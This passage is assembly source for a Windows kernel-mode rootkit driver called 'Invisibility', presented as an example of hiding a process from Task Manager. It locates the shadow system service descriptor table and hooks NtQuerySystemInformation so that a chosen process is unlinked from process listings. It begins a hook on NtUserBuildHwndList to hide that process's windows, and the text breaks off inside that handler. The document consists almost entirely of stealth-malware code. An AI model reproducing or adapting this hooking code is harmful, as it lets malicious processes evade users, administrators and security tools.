invisibilitykmd.bat

This is an example how one could hide a process on Windows based operation systems from task viewer

;@ECHO OFF
;GOTO MAKE

Comment %

-----------------------------------------------------------------------------------------
  Invisibility - Kernel Mode Driver
  ---------------------------------
  
  Purpose:
  
  - hook ntoskrnl!NtQuerySystemInformation and modify the API output to hide a
    specified process
  - hook win32k!NtUserBuildHwndList and modify the API output to hide the
    window handles, owned by the target process, to the caller
    
  by yoda

-----------------------------------------------------------------------------------------

%

.386
.MODEL FLAT, STDCALL
OPTION CASEMAP:NONE

INCLUDE     \masm32\include\windows.inc

INCLUDE     string.INC
INCLUDE     ntstruc.INC
INCLUDE     ntddk.INC
INCLUDE     ntoskrnl.INC
INCLUDE     NtDll.INC
INCLUDE     IoCtrl.INC
INCLUDELIB  \masm32\lib\wdm.lib
INCLUDELIB  \masm32\lib\ntoskrnl.lib
INCLUDELIB  \masm32\lib\ntdll.lib

;
; structure one can find at ntoskrnl!KeServiceDescriptorTable and at 'KeServiceDescriptorTableShadow'
;
SSDT STRUCT
	pSSAT              LPVOID  ?      ; System Service Address Table   ( LPVOID[] )
	Obsolete           DWORD   ?      ; or maybe: API ID base
	dwAPICount         DWORD   ?
	pSSPT              LPVOID  ?      ; System Service Parameter Table ( BYTE[] )
SSDT ENDS

;
; structure being built by the PUSHAD instruction on the stack
;
PUSHA_STRUCT STRUCT 1
	_EDI               DWORD ?
	_ESI               DWORD ?
	_EBP               DWORD ?
	_ESP               DWORD ?
	_EBX               DWORD ?
	_EDX               DWORD ?
	_ECX               DWORD ?
	_EAX               DWORD ?
PUSHA_STRUCT ENDS

;------------CONST-----------------------------------------------------------------------
.CONST
TEXTW szDevPath,           <\Device\INVISIBILITY/0>
TEXTW szSymPath,           <\DosDevices\INVISIBILITY/0>

;------------DATA------------------------------------------------------------------------
.DATA
pDevObj                     PDEVICE_OBJECT 0
pNQSI                       DD -1                                              ; ptr 2 ntdll!NtQuerySystemInformation
;pEW                         DD -1                                              ; ptr 2 user32!EnumWindows
dwTargetPID                 DD -1
dwNQSI_NT_ID                DD -1
pOldNtOsNQSI                DD  0
dwNUBHL_NT_ID               DD -1                                              ; ID of win32k!NtUserBuildHwndList
pOldWin32kNUBHL             DD  0
pKSDTS                      DD  0                                              ; filled in DriverEntry
pGetWindowThreadProcessId   DD -1

;------------CODE------------------------------------------------------------------------
.CODE
ASSUME FS : NOTHING

;
; Returns:   -1    = error
;            else  = Native API ID
;
; Args:      pApiEntry = EntryPoint address of a NTDLL routine
;
; Should look like....
; pApiEntry:
;            B8 XX XX XX XX        MOV     EAX, XXXXXXXX
;            8D 54 24 04           LEA     EDX, [ESP + 004h]
;            CD 2E                 INT     02Eh
;            C2 YY YY              RET     YYYY
;
NativeApiIdFromApiAddress PROC USES ESI EDI EBX, pApiEntry : LPVOID
	SUB     EAX, EAX
	DEC     EAX                                                            ; EAX -> -1 == error
	
	; signature check
	MOV     ESI, pApiEntry
	LODSB
	CMP     AL, 0B8h
	JNZ     @@exit
	LODSD
	LODSD
	CMP     EAX, 00424548Dh
	JNZ     @@exit
	LODSW
	CMP     AX, 02ECDh
	JNZ     @@exit
	LODSB
	CMP     AL, 0C2h
	JNZ     @@exit
	
	; grab NT API index
	MOV     EAX, pApiEntry
	MOV     EAX, [EAX + 1]
  @@exit:
	RET
NativeApiIdFromApiAddress ENDP

;
; Purpose:      Searches in memory for the so called KeServiceDesciptorTableShadow
;
; Return type:  void*; NULL == error
;
GetKeServiceDescriptorTableShadow PROC USES ESI EDI EBX
	; search for a ServiceDescriptorTable being equivalent to the one at KeService...
	MOV     ESI, _KeServiceDescriptorTable
	MOV     ESI, [ESI]                                                     ; ESI -> non-shadow SDT
	LEA     EDI, [ESI + 16]
	MOV     EBX, 0100h                                                     ; 0x100 * 16 bytes will be scanned
	XOR     EAX, EAX                                                       ; EAX == success indicator
  @@scan_loop:
  	PUSH    EDI
  	CALL    MmIsAddressValid
  	TEST    EAX, EAX
  	JZ      @F
  	PUSH    ESI
  	PUSH    EDI
  	MOV     ECX, 16
  	REPZ    CMPSB
  	POP     EDI
  	POP     ESI
  	JNZ     @F                                                             ; found the 2nd KSDT structure
  	
  	; found ? -> do additional tests
  	LEA     EAX, [EDI + 16]                                                ; EAX -> SDT 2 test
  	MOV     ECX, [EAX].SSDT.pSSAT
  	TEST    ECX, ECX
  	JNS     @F
  	MOV     ECX, [EAX].SSDT.Obsolete
  	TEST    ECX, ECX
  	JNZ     @F
  	MOV     ECX, [EAX].SSDT.dwAPICount
  	SHR     ECX, 16                                                        ; ECX == high word of struct.counter
  	JNZ     @F
  	MOV     ECX, [EAX].SSDT.pSSPT
  	TEST    ECX, ECX
  	JNS     @F
  	JMP     @@exit
  @@:	
  	; prepare 4 next location
  	ADD     EDI, 16
  	DEC     EBX                                                            ; decrease check counter
  	JNZ     @@scan_loop
  @@scan_end:
        XOR     EAX, EAX                                                       ; indicate: error
  @@exit:
	RET
GetKeServiceDescriptorTableShadow ENDP

;
; Purpose:      Wipe structure of our process from the information record chain returned by
;               NtQuerySystemInformation
;
; Return type:  void
;
HandleSystemProcessInfoOutput PROC pData
	MOV     ESI, pData                                                     ; ESI -> info blocks
	; loop through the SystemProcessInformation blocks and save the address
	; of our process block (-> EDI)
	SUB     EDI, EDI                                                       ; EDI will save ptr to our SPI
	SUB     EBX, EBX                                                       ; EBX will save ptr to block before our SPI
  HSPIO_loop:
  	CMP     DWORD PTR [ESI], 0                                             ; end of blocks reached ?
  	JZ      HSPIO_loop_end
  	MOV     EAX, [ESI].NT4_SYSTEM_PROCESS_INFORMATION.ProcessId
  	CMP     EAX, dwTargetPID
  	JNZ     @F
  	MOV     EDI, ESI                                                       ; we found our SPI block !
  	JMP     HSPIO_loop_end
  @@:
  	; next block
  	MOV     EBX, ESI
  	ADD     ESI, [ESI]                                                     ; ESI -> ptr to next block
  	JMP     HSPIO_loop  	
  HSPIO_loop_end:
	;  
  	; simply wipe the SPI block of our process by enlarging the upper block
  	;
  	TEST    EDI, EDI
  	JZ      @@exit
  	MOV     ECX, [EDI]                                                     ; ECX == size of target SPI
  	ADD     [EBX], ECX
  @@exit:
	RET
HandleSystemProcessInfoOutput ENDP

;
;NTSTATUS NTAPI
;NtQuerySystemInformation (SYSTEMINFOCLASS sic,
;                          PVOID           pData,
;                          DWORD           dSize,
;                          PDWORD          pdSize);
;
NtQuerySystemInformationHook:
;	INT     3
	PUSHFD
	PUSHA
	; get ptr to argument list
	LEA     EDI, [ESP + SIZEOF PUSHA_STRUCT + 4 + 4]                       ; EDI -> argument list
	; call the NT API
	PUSH    [EDI + 00Ch]                                                   ; push arguments
	PUSH    [EDI + 008h]                                                   ;
	PUSH    [EDI + 004h]                                                   ;
	PUSH    [EDI + 000h]                                                   ;
	PUSH    @F                                                             ; push RETurn address
	JMP     [pOldNtOsNQSI]
  @@:
	MOV     EDX, EAX                                                       ; EDX == call result
	; handle the call output
	SUB     EAX, EAX
	CMP     EDX, EAX                                                       ; STATUS_SUCCESS ?
	JNZ     @@NQSIH_test_done
	CMP     DWORD PTR [EDI], 5                                             ; our target query class ?
	JNZ     @@NQSIH_test_done

	PUSH    [EDI + 004h]
	CALL    HandleSystemProcessInfoOutput

  @@NQSIH_test_done:
        MOV     [ESP].PUSHA_STRUCT._EAX, EDX                                   ; save EDX 2 popad'ed EAX
	POPA
	POPFD
	
	RET     4 * 4

;
; Purpose:      Wipe the HWNDs form the HWND array being returned by NtUserBuildHwndList
;
; Return type:  void
;
HandleNtUserBuildHwndListHookOutput PROC pData
	LOCAL   dwPID      : DWORD
	
;	INT     3
	;
	; trace HWND chain
	;
	MOV     ESI, pData                                                     ; ESI -> HWND chain
  @@loop:
        MOV     EBX, [ESI]                                                     ; EBX == current HWND from chain

        ; We can call user32!GetWindowThreadProcessId from KernelMode ! It
        ; doesn't call any other APIs. It receives all information from the
        ; raw internal NT structures. -> *happiness*
        LEA     EAX, dwPID
        PUSH    EAX
        PUSH    EBX
        CALL    pGetWindowThreadProcessId
        TEST    EAX, EAX
        JZ      @@loop_end